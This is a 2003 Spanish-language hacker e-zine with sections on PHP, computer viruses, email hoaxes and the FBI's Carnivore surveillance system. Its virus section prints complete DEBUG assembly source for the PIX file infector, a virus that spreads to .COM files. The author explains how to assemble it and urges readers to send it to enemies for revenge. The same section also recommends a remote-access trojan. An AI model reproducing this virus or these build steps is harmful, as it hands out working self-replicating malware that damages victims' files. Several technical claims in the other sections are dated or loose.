*· :.+ .°·:* · :.+ .·°.Alebrije Warriors Team.°:·.·.+ · *· :.+ .°·:*
 #################################################################### 
    ############      ###       ####        ####      ############    
        ###           ###        ##           #           ####        
        ###           ###        ##           #           ####        
        ###           ###        ##           #           ####        
         ##          #####       ##           #            ##         
         ##          #####       ##          ###           ##         
         ##           ###       ####        #####          ##         
         ##                    ######       #####          ##         
        ###                    ######        ###           ##         
       #####    E-Zine   2      ####               2003    ##         
      #######                    ##                        ##         
      #######                                             ####        
       #####                                             ######       
        ###                                              ######       
                                                         ######       
                                                         ######       
                                                          ####       
     #   #                                                     
     #   #                                                     
           ##     ###                             ###       
      ###     ##    ## ##  #####        #  # ####   ## ##      
      ###     ##           ##  ##              ##              
     ## ##    ##    ####   ##  ##  ## ## ##    ##   ####       
     ## ##    ##   ##  ##  #####   ##### ##    ##  ##  ##      
     ## ##    ##   ######  ##  ##  ##    ##    ##  ######      
    #######   ##   ##      ##  ##  ##    ##    ##  ##          
    ##   ##   ##   ##   #  ##  ##  ##    ##    ##  ##   #      
    ##   ##   ##    ####   #####   ##    ## ####    ####       
              ##                                               
              ##                                               

=()=-=()=-=()=-=()=-=()=-=()=-=()=-=()=-=()=-=()=-=()=-=()=-=()=-=()=-=


[°±°±²±°±²±°±²±°²±°±°±²±°±²±°[Menú de Hoy]°±°±²±°±²±°±²±°²±°±°±²±°±²±°]

                                    1.- Participantes de Ä|êBrïJê/Wärr|ôrs/TëâM
                                    2.- Introducción
                                    3.- PHP (Páginas Web)
 No es mucho pero leeanlo           4.- Un Virus
 esta bien informado y bien         5.- Rumores de E-mails
 hecho                              6.- Carnivore
         *el-guru*                  7.- Despedida

[°±°±²±°±²±°±²±°²±°±°±²±°±²±[Participantes]°±°±²±°±²±°±²±°²±°±°±²±°±²±]

                        el-guru - Redacción y truquillos xD~~
                        ^^-KiLLeR-s0n-^^ - Me enseña
	
	 
[°±°±²±°±²±°±²±°²±°±°±²±°±²±[Introducción]°±°±²±°±²±°±²±°²±°±°±²±°±²±]

  Esta E-Zine esta escrita por el equipo Ä|êBrïJê/Wärr|ôrs/TëâM del
 Chat de Terra México que su server es 200.53.64.3:7003 donde puedes
 encontrarme a mi y al Team, por cuestiones del chat que no tiene nada
 que ver con el Team, el cuarto no se registrar así que solo estará
 abierto cadavez que alguien del team llegue... y recuerda que esta
 E-Zine esta escrita con fines educativos e informativos.

Salu2 el-guru


[°±°±²±°±²±°±²±°²±°±°±²±°±²±[PHP Full!]°±°±²±°±²±°±²±°²±°±°±²±°±²±]
  

 Las   siglas   PHP  significa "Hypertext   Preprocessor  o   PreProcesador
 de Hipertexto", nos referimos a un lenguaje de programacion que esta 
 orientado al desarrollo de aplicaciones web. 

 Cuando hablamos de desarrollar aplicaciones web, PHP significa una herramienta
 muy util para  la  creacion de  dichas  cosas, conjuntamente  con Apache
 (Donde dicen que es el mejor servidor web que existe en el mundo) y algun 
 manejador de bases de datos (SQL). Podemos crear  sitios  interactivos y 
 elegantes a la vez. 

 Se puede decir que PHP es un lenguaje comodo que es muy asimilar a otros 
 lenguajes  (C,C++), es rapido (a pesar que es interpretado), es  multiplataforma,
 dispone  de librerias que facilitan el desarrollo de las aplicaciones,  su  
 codigo es mantenible, es de facil entendimiento.

 Este  lenguaje esta basado  con  licencias de Software Libre (como los S.O. Linux)
 por lo tanto no tenemos  que  pagar ni un $1 peso por él, podemos modificarlo
 ampliar sus funciones e infinidad de cosas ya que es muy flexible

Para conseguir tu PHP bajalo de http://es.php.net/downloads.php, alli podras 
encontar las versiones para los Unix, Mac, y Windows 95/98 -no hay para el 
NT o el 2000 y mucho menos para WindowsXP- (les he dado una web española de
PHP porque es la oficial y ademas no me sé una de México)

CONTENIDO de PHP (solo algunas cosas, lo mas significativo)

• Se puede incluir codigo en HTML.
• Es Portable. 
• PHP no es case sensitive (no  distingue  mayusculas de minusculas)
• En PHP no se declaran las variables y no tienen un tipo fijo.
• Envio de correo con SMTP. 
• Acceso a servidores de FTP. 
• Generacion dinamica de graficos y documentos PDF. 
• Corrector de ortografia. 
• Y muchisisisisisisisisisimo mas... xD~~


S.O. que soporta el PHP:

• UNIX                    
• Win32 (NT/W95/W98)     
• QNX                     
• Mac (WebTen)           
• OS/2    
• OS/390

Interfaces de Servidor

• Apache module
• ISAPI module (Microsoft IIS, Zeus) 
• fhttpd module
• NSAPI module (Netscape)            
• CGI 
• WSAPI module (WebSite (O'Reilly))  
• Roxen module                       

(NO conosco todos pero saque la información =D)

Bases de Datos SQL con las que trabaja actualmente.

• Adabas D                             
• Empress                             
• IBM DB2                        
• Informix                          
• Interbase                          
• mSQL                                 
• MySQL                            
• ODBC
• Oracle                              
• PostgreSQL                           
• Raima Velocis                    
• Solid                               
• Sybase                       
 

[°±°±²±°±²±°±²±°²±°±°±²±°±[Un Virus]°±°±²±°±²±°±²±°²±°±°±²±°±]


 En este pequeño lugar del E-Zine quiero explicar lo que es un virus
 así de como se constituye y como un virus sigue siendo un programa,
 tambien como evitar infectarse por E-Mail... principalmente en Hotmail
 que tu mail siempre esta expuesto ahí por las famosas cadenas.

 Basico:

 Antes de empezar a soltar el rollo voy a hacer, unas pequeñas definiciones
 sobre el mundo de los virus, es mas que nada para los que no tengan idea
 de casi nada de este mundo.

• VIRUS: Es un pequeño programa generalmente escrito en cualquier tipo de
          lenguaje (desde Visual Basic - hasta Esamblador), y sabras que
          un Virus es un simple programa.

• Troyano: Es un programa legal (en apariencia) que lleva en su interior un
           codigo dañino en cuestion, a diferencia de un virus este no se 
           autoreplica solo se ejecuta una vez (y ya es suficiente para 
           que acabe con tu disco ó de acceso a gente agena por puertos que
           el Troyano habré, Por el momento uno de los mas famosos y que
           recomiendo ampliamente usar es el LiTTleWitCH.
 
• Gusano ó Worm: Es un programa que se desplaza por la memoria del ordenador
                 (RAM), busca zonas de memoria desocupadas en las que realiza
                 copias repetidas hasta provocar un desbordamiento de memoria,
                 se usan mayoritariamente en redes, uno de los mas famosos 
                 por el momento es el BLASTER.

• Bomba Lógica: Es un pequeño programa que permanece, oculto y ni se 
                autoduplica ni se desplaza en memoria, tan solo espera a 
                que llegue una fecha determinada o que alguien ejecute una
                orden y entonces se activa el proceso desmadrador!!!.
               
 Bien es hora de pasar a lo que realmente interesa el principio de un
 virus. Solo se necesita saber algo de programacion, y ganas de aprender
 ya vereis que al final no es tan dificil hacer un virus simple y 
 a partir de ahi mejorarlo.

 ¿Como actua un Virus?

• Busca un fichero para infectar (*.exe, *.com etc...)
• Lo abre y comprueba el tipo de fichero, tamaño y si esta infectado.
• Si esta infectado, lo cierra y busca otro
• En el punto anterior si no esta infectado lo infecta
• Y así sigue hasta que destroza las PC's.

 Llego la hora del ejemplo. Es un virus llamado PIX, quiza no es muy famoso
 y mucho menos una maravilla de virus, pero sirve de ejemplo.

          
!!!Nota: Si lo haces fichero *.COM con el DEBUG
         de Windows el virus estara activo, asi que si lo ejecutas
         pues ¿que crees que pase?
        

NPIX.COM
A
JMP 0116
DB  90,49,56,00,2A,2E,43,4F,4D,00,4F,04,00,00,01,00,00,00,00,00
MOV AX,CS
ADD AX,1000
MOV ES,AX
INC BYTE PTR [0105] ; Incrementa el contador de generaciones.
MOV SI,0100
XOR DI,DI
MOV CX,014F
REPZ
MOVSB
MOV DX,025F
MOV AH,1A
INT 21              ;Se encarga de crear el DTA para los ficheros...
MOV DX,0106         ;con extension *.COM
MOV CX,0018
MOV AH,4E
INT 21
JB 019E
MOV DX,027D
MOV AX,3D02         ;Abre el fichero en modo lectura/escritura.
INT 21
MOV [0114],AX
MOV BX,AX
PUSH ES
POP DS
MOV DX,034F
MOV CX,FFFF
MOV AH,3F
INT 21
ADD AX,034F
CS:
MOV [0112],AX       ;A continuacion, la firma del virus:
dB 3E,81,3E
DB 52,03
DB 49,56
JZ 0188
XOR CX,CX
MOV DX,CX
CS:
MOV BX,[0114]
MOV AX,4200
INT 21              ;Desplaza el puntero.
JB 0188
MOV DX,0000
CS:
MOV CX,[0112]
CS:
MOV BX,[0114]
MOV AH,40
INT 21              ;Salva virus y programa contaminado.
CS:
MOV BX,[0112]
MOV AH,3E
INT 21              ;Cierra el fichero.
PUSH CS
POP DS
MOV AH,4F
MOV DX,025F
INT 21
JB 019E
JMP 013E
MOV DX,0080
MOV AH,1A
INT 21              ;Restaura el DTA original.
CMP BYTE PTR [0105],05 ; ¨Quinta verción?...
JB 0207                ; Si es asi, comienza el espectaculo.
MOV AX,0040
MOV DS,AX
MOV AX,[006C]       ; Aleatoriedad de manifestacion del virus...
PUSH CS             ; mediante el registro de decimas de segundo.
POPDS
AND AX,0001
JZ 0207
MOV DX,01C4
MOV AH,09
INT 21
INT 20              ; A continuacion, el mensaje del virus.
DB 59,4F,55,52,20,50,43,20,48,41,56,45,20,41,20,4D,45,53,53,41,4A,52
DB 20,46,4F,52,20,59,4F,55,20,3A,20,4A,4F,44,45,54,45,20,59,20,45,53
DB 50,45,52,41,20,43,41,4D,49,4C,4F,20,4A,4F,53,45,20,43,45,4C,41,2E
DB 24
MOV SI,0224
MOV CX,002B
XOR DI,DI
REPZ
MOVSB
XOR DI,DI
CS:
MOV WORD PTR [010E],0000
CS:
MOV [0110],ES
CS:
JMP FAR [010E]
PUSH DS
POP ES
MOV SI,044F               ;el-guru sigue explicando xD~~
CMP BYTE PTR [0105],01
JNZ 0234
SUB SI,0200
MOV DI,0100
MOV CX,FFFF
SUB CX,SI
REPZ
MOVSB
CS:
MOV WORD PTR [0100],0100
CS:
MOV [0102],DS
CS:
JMP FAR [0100]      ; Salto a la ejecucion del verdadero programa...
INT 20              ; siempre que se trate de una generacion...
INT 20              ; posterior a la primera, y por tanto, exista.
DB 0,0

R CX
154
W
Q

!!!Nota:
 Este punto será de suma importancia ya que te diré como activarlo,para
 vengarte de enemigos solo copia el texto anterior pero quítale los ;opninion
 y copialo en un archivo despues pasalo al Edit de Windows que esta en 
 C:\Windows\System32\edit.exe y ahi pasalo despues lo guardas con extencion
 .com es decir VIRUS.COM ó PIX.COM HOTMAIL.COM, despues habre MS-DOS de
 Windows y coloca: DEBUG y entres despues saldrá una Linea

- (donde colocas) DEBUG < c:\misarchivos\VIRUS.COM y Listo!!! a enviar

[°±°±²±°±²±°±²±°²±°±°±²±°±[Rumores E-MAIL]°±°±²±°±²±°±²±°²±°±°±²±°±]


 Hola, quise escribir este artículo por la gente que se espanta a cada rato y
 cada vez que le dicen... "TE VOY A MANDAR UN VIRUS POR E-MAIL" y aun mas 
 tonto el que se la cree...

 Hablemos de E-mails

• Puedo contagiarme de un virus por E-Mail?

 Otro de los "RUMORES" que han corrido por ahi, decia que si alguien
 recibia un mensaje con el Subject: Good Times que no lo abriese porque se
 instalaba un virus en el ordenador, como de costumbre la pendejes informatica
 nos invade y la falta de sentido comun hicieron el resto y hubo
 desaprensivos que se "jartaron" de enviar mensajes con dicho subject para
 partirse de risa ante el temor de las victimas.

 Habra que recordar que un "Virus" no tiene poderes magicos, que es un
 programa como cualquier otro y que un programa tiene que *ejecutarse*
 para que haga algun efecto (bueno o malo), leer un mensaje es totalmente
 "inofensivo". Por supuesto si que hay que tener cuidado con los "attach" 
 puesto que son ficheros que pueden estar infectados (o ser un virus en
 sí) asi como con cualquier download pero si tenemos unos buenos y 
 actualizados antivirus (Recomiendo PANDA) no hay problema. Ni Internet ni
 las Webs destacan por tener archivos infectados, los sites con material 
 virico son minoria y destacan claramente que contienen sus archivos.

 Así que NO PANIC!!!

• Es verdad que hay un monton de tipos que husmean todos los ficheros
  transmitidos por e-mail?

 Pues bien... habia rumores de que Microsoft estaba inspeccionando todos
 los E-mails de Hotmail, pero eso es totalmente una mentira... es una mentira
 tan grande como : "MICROSOFT NOS VIGILA POR MEDIO DEL WINDOWS MEDIA PLAYER"
 (JAJAJAJA!!! me muero de risa"), pues bien Nada de eso es cierto lo que si
 hay que tomar en cuenta es que tienes que Encriptar tus E-mails si contienen
 información Hacker... ya que eso nos servirá por futuras supuestas-culpas.
 
• En verdad Microsoft, AOL, Tutopia, Terra, TelMex, etc... dan $$ por cadenas?

 Bueno pues que dire... nadamas me rio cuando me mandan esas cadenas... como
 una que decia que un niño tenia un tumor en el CORAZON!!! mientras no hay 
 tumores en el corazon humano... pues bien es mejor que nunca envies esas 
 cadenas porque empresas de JUGUETES-SEXUALES y otras mas... toman esos 
 E-mails para enviarte publicidad por medio de los mails ya que empresas
 como Hotmail usan sistema de E-mail (STMP mail.hotmail.com) POP3 pues es 
 facil enviar 60 mails a la vez.

 Otros dicen que es para saturar las terminales de Microsoft y para que caiga
 el sistema de microsoft... jajaja pues no... creen que Microsoft se dejaria
 tirar???? primero invaden los EXTRATERRESTRES antes de que Microsoft caiga.

el-guru

[°±°±²±°±²±°±²±°²±°±°[Que es Carnivore y Como Funciona]°±°±²±°±²±°±²±°²±°±°]

 Este artículo que escribiré es del CARNIVORE para que sepan un poquito mas
 de seguridad y que sepan con que nos VIGILAN LOS OJETES ESTOS...

 Probalemente muchos de ustedes ya han oido hablar de Carnivore.
 Este es un programa hecho por el FBI para dar a esta agencia el accesso de
 monitorear a gente sospechosa por internet, esdecir rastrear weyes que andan
 hackeando páginas.

 Pero antes bamos al los padres y antepasados del Carnivore:

• Omnivore fue desechado en 1999 y fue reemplazado por DragonWare Suite
  donde este contiene tres partes: 

• Carnivore- un programa para windows NT/2000 que caputra 
             informacion. 
• Packeteer- la informacion de este programa no ha sido revelada por 
             el FBI pero supuestamente es una aplicacion que compara 
             paquetes con mensajes o paginas web
• Coolminer- la informacion de este programa no ha sido revelada 
             por el FBI pero se cree que es una aplicacion para 
             analisar datos que se encuentran en los mensajes.

 DragonWare Suite no es una tecnologia nueva como muchos lo piensan. Carnivore 
 es un sistema muy controversial y aqui explicaremos  el processo que el 
 FBI sigue para utilizar este sistema.  
  
 Primero el FBI tiene que tener una sospecha de que alguien este involucrado 
 en fraude electronico. Despues tienen que conseguir un permiso de la 
 corte de EU para que tengan derecho de monitorear toda la informacion 
 que sea nesesaria del sospechoso.  Luego contactan al ISP y les piden 
 una copia de los archivos del sospechoso (si es que el isp los tiene). 
 
 El FBI luego se mete al ISP e instala Carnivore en una computadora aparte.  
 La computadora tiene las siguientes caracteristicas:

• Pentium III, 128Mb RAM, Windows NT/2000
• Una applicacion comercial de comunicaciones
• Una aplicacion creada en c++ que trabaja en conjunto con lo mencionado arriba 
  para lo que es el sniffing y el filtering
• Una llave fisica para accesar la computadora que contiene carnivore en el ISP.
• Un sistema para aislar la computadora de la red y que se vea invisible, de esta 
  forma no puede ser accesada remotamente o comprometida.
• Un Jaz drive en el que se puede meter 2gb en una sola unidad, esto es para 
  guardar los paquetes caputrados del sospechoso.

 Despues el FBI configura Carnivore con la direccion ip de el sospechoso para
 que nadamas capture paquetes de el sospechoso e ignore los demas.  Luego 
 Carnivore copia todos los archivos del sospechoso sin impedir el trafico de 
 la red. Despues el programa usa un filtro para clasificar los paquetes 
 recibidos. De esta manera por el protocolo el programa pone en orden los 
 paquetes de email, los de la web etc...  Despues estos paquetes son guardados 
 al cartucho jaz. Luego cada dia o dos un agente del FBI saca el cartucho lo 
 cambia por uno nuevo, agarra el cartucho usado le pone la fecha y lo sella en 
 una caja.  Si el sello se abre la persona que lo abrio debe de ponerle fecha otra 
 vez y firmarlo de lo contrario el cartucho ya no se considera evidencia imporante.  
 El FBI debe de irse en un mes a menos de que la corte apruebe mas tiempo.  El 
 FBI desarma el sistema y se va del ISP, despues usan Coolminer para checar lo 
 que tienen los cartuchos. Despues el FBI tiene permiso de utilizar lo encontrado 
 en la corte.

 El FBI utiliza Carnivore para differentes casos por ejemplo, terrorismo, 
 espionaje, fraude, informacion de guerra, o pornografia infantil.  Este sistema 
 es controversial ya que muchos piensan incluyendome que esto es una violacion de 
 la privacia.  Si Carnivore se usa sin permiso de la corte entonces esto es  
 ilegal y la idea de que alguien pueda revisar lo que haces sin que lo sepas es 
 horrible.  Hay rumores que dicen que Carnivore es un sistema que regula toda la 
 internet y ve todo lo que todos hacen pero para hacer eso el FBI tendria que 
 meter sus sistemas en todos los servidores incluyendo privados comerciales y 
 educacionales y digamos que esto lo logran hacer, es imposible que lo hagan en 
 todo el mundo ya que si se meten a otro pais ya se meterian en problemas.  
 Tambien hay rumores de que el sistema busca palabras como "bomba" o "asesinato" 
 esto es negado por el FBI ya que viola los derechos establecidos en la 
 constitucion de EU.  Este sistema mencionado se dice llamar Echelon y 
 supuestamente se rumora que fue creado por la NSA (Nacional Security Agency) 
 no hay evidencia solida de que esto exista.  Mucho confunden Echelon con 
 Carnivore pero son dos cosas diferentes.  

 Muchos se han preguntado esto. Que impide al FBI ver mas cosas de las que deben
 ver? Por lo general el FBI nadamas es otorgado monitorear el puerto 25 que es de 
 email y a veces otros puertos por si el sospechoso usa hotmail.  En pocas ocaciones
 se le otorga al FBI derecho de ver mas cosas como las paginas que navegas o algun
 otro puerto que utilizas.  Otra cosa muy importante es el hecho de que ya instalado
 el sistema Carnivore en el ISP el FBI puede ver toda la subred.  Que impide a los 
 agentes ver algo que no deben.  Si pueden ver toda la subred de la isp entonces 
 pueden ver a todos.

 Hay varias formas de solucionar el problema para que el FBI no pueda utilizar Carnivore
 Primero que nada yo recomiendo fuertemente que encripten todo lo que mandan por email
 y de esta forma previenes que puedan ver los datos. 

CONSEJO PA JAIKERS: (siempre me da risa esa palabra... Jaikers que me recuerda un taquero)
 Esta forma puede que funcione pero es tambien probable que puedan ver tu private 
 key y no te sirva de nada asi que tambien ten conecciones SSH a sistemas remotos
 que corran sendmail o utiliza conexiones encriptadas dedicadas de dial-up y otras
 soluciones VPN tambien pueden funcionar. 
  
 El FBI se ha negado en dar el codigo fuente de Carnivore y dicen que no violan 
 ningun acuerdo con la consitucion.

 Así que cuidadito con andar HACKEANDO webs caones!!!

 SALU2 el-guru


[±°±²±°±²±°±²±°²±°±°±²±°±[Despedida]±°±²±°±²±°±²±°²±°±°±²±°±]

 Pues bien Ä|êBrïJê Wärr|ôrs TëâM se despide, y ya sabes donde contactarnos
 para cualquier cosilla que se te atore en Terra México:
 Server: -200.53.64.3
 Puerto: -7003
 Canal:  #Ä|êBrïJê/Wärr|ôrs/TëâM

 Nada mas que decir... Salu2
 
 *el-guru*